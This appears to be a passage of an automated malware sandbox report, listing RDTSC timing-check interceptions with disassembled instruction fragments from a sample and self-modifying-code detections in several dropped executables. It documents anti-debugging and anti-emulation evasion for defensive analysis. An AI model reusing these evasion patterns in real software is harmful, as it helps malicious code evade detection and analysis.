Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F4484 second address: 4F4488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F54D1 second address: 4F54EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C98BA52BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007F8C98BA52B6h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F54EC second address: 4F5556 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F8C99233272h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F8C99233268h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a add dword ptr [ebp+122D1CF0h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F8C99233268h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F5556 second address: 4F555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E5AA5 second address: 4E5AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233275h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C99233273h 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E6B4E second address: 4E6B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E6C31 second address: 4E6C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8C99233266h 0x00000009 ja 00007F8C99233266h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F8C99233266h 0x0000001c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E7B63 second address: 4E7B6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E8BD2 second address: 4E8BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4E8BF5 second address: 4E8BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EBD10 second address: 4EBD99 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C99233266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jno 00007F8C9923326Eh 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1EBCh], ecx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov bx, 9B1Eh 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F8C99233268h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 movsx edi, ax 0x00000048 mov eax, dword ptr [ebp+122D0449h] 0x0000004e mov dword ptr [ebp+122D2976h], ebx 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push edi 0x00000059 call 00007F8C99233268h 0x0000005e pop edi 0x0000005f mov dword ptr [esp+04h], edi 0x00000063 add dword ptr [esp+04h], 00000015h 0x0000006b inc edi 0x0000006c push edi 0x0000006d ret 0x0000006e pop edi 0x0000006f ret 0x00000070 push eax 0x00000071 push edx 0x00000072 je 00007F8C9923326Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FAE2A second address: 4FAE30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FAE30 second address: 4FAE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 492997 second address: 49299D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 49299D second address: 4929DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C99233275h 0x00000009 jnl 00007F8C99233266h 0x0000000f popad 0x00000010 jmp 00007F8C9923326Dh 0x00000015 push ecx 0x00000016 jmp 00007F8C9923326Fh 0x0000001b pop ecx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FC4FC second address: 4FC501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FF494 second address: 4FF4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C99233274h 0x00000009 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FF4AC second address: 4FF4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EEDFA second address: 4EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EFE4A second address: 4EFE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EFE57 second address: 4EFE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EFE5B second address: 4EFE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FF76E second address: 4FF782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jne 00007F8C99233266h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f popad 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EFE61 second address: 4EFE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4FF782 second address: 4FF78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4EFE67 second address: 4EFF03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D1D73h] 0x00000013 mov dword ptr [ebp+122D23F3h], esi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov ebx, 6E01E4D1h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F8C98BA52B8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov eax, dword ptr [ebp+122D1439h] 0x0000004c pushad 0x0000004d jmp 00007F8C98BA52BAh 0x00000052 add dword ptr [ebp+1245374Ch], edx 0x00000058 popad 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007F8C98BA52B8h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 nop 0x00000076 jmp 00007F8C98BA52BAh 0x0000007b push eax 0x0000007c jnp 00007F8C98BA52C4h 0x00000082 push eax 0x00000083 push edx 0x00000084 je 00007F8C98BA52B6h 0x0000008a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F57D7 second address: 4F57DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4F4640 second address: 4F4657 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C98BA52B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jng 00007F8C98BA52B6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 506141 second address: 506147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 506147 second address: 506162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C98BA52C0h 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 506162 second address: 50618B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C99233270h 0x00000015 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 506294 second address: 50631B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8C98BA52BCh 0x00000008 jnc 00007F8C98BA52B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jno 00007F8C98BA52B8h 0x00000018 pushad 0x00000019 jg 00007F8C98BA52B6h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F8C98BA52C8h 0x0000002e jmp 00007F8C98BA52BCh 0x00000033 popad 0x00000034 push edx 0x00000035 jnl 00007F8C98BA52B6h 0x0000003b pop edx 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f push edx 0x00000040 jo 00007F8C98BA52BCh 0x00000046 jns 00007F8C98BA52B6h 0x0000004c pop edx 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 pushad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 jmp 00007F8C98BA52C2h 0x0000005a popad 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B748 second address: 50B768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C9923326Fh 0x0000000e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 48F459 second address: 48F45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 48F45F second address: 48F465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 48F465 second address: 48F46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50ABAB second address: 50ABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C9923326Ch 0x0000000a push ebx 0x0000000b jbe 00007F8C99233266h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50ACE5 second address: 50ACE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50ACE9 second address: 50ACED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50AE8A second address: 50AEA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F8C98BA52BDh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50AEA1 second address: 50AEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50AEAB second address: 50AECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8C98BA52CFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C98BA52BDh 0x00000017 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50AECA second address: 50AECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B01A second address: 50B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B180 second address: 50B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B184 second address: 50B1A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C98BA52C3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B42D second address: 50B434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B593 second address: 50B597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50B597 second address: 50B5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50DA4F second address: 50DA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8C98BA52C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50DA69 second address: 50DA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 50DA6D second address: 50DA75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 513177 second address: 51318B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 49443E second address: 494450 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C98BA52BCh 0x00000008 jnl 00007F8C98BA52B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511AEF second address: 511B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Eh 0x00000009 jl 00007F8C99233266h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511B0C second address: 511B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511B12 second address: 511B1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F8C99233266h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511B1D second address: 511B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007F8C98BA52B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511B2B second address: 511B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 511B3B second address: 511B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512114 second address: 51212D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C9923326Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 51212D second address: 512139 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C98BA52BEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512139 second address: 512140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512140 second address: 51214C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8C98BA52B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 51250B second address: 512515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512678 second address: 512682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C98BA52B6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512682 second address: 5126B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8C9923326Fh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8C99233272h 0x00000017 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 5126B7 second address: 5126BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 5126BC second address: 5126C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512B4B second address: 512B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F8C98BA52BEh 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007F8C98BA52CCh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 512B7F second address: 512B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Bh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8C99233266h 0x00000012 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4978E9 second address: 4978EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 5177A6 second address: 5177C7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C99233266h 0x00000008 jmp 00007F8C9923326Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F8C99233268h 0x00000015 rdtsc
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	RDTSC instruction interceptor: First address: 4D989B second address: 4D98A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CCF81C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: E7ED94 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Special instruction interceptor: First address: 4D086B instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Special instruction interceptor: First address: 5585EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 71086B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7985EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Special instruction interceptor: First address: 111E607 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Special instruction interceptor: First address: 11B9DA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: 825C7F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: 825D56 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: 9BF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: 8231E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: 9C88F5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Special instruction interceptor: First address: A4D757 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 9C8969 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 9C8A90 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: 9C896F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: B6F5C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Special instruction interceptor: First address: B9CB02 instructions caused by: Self-modifying code
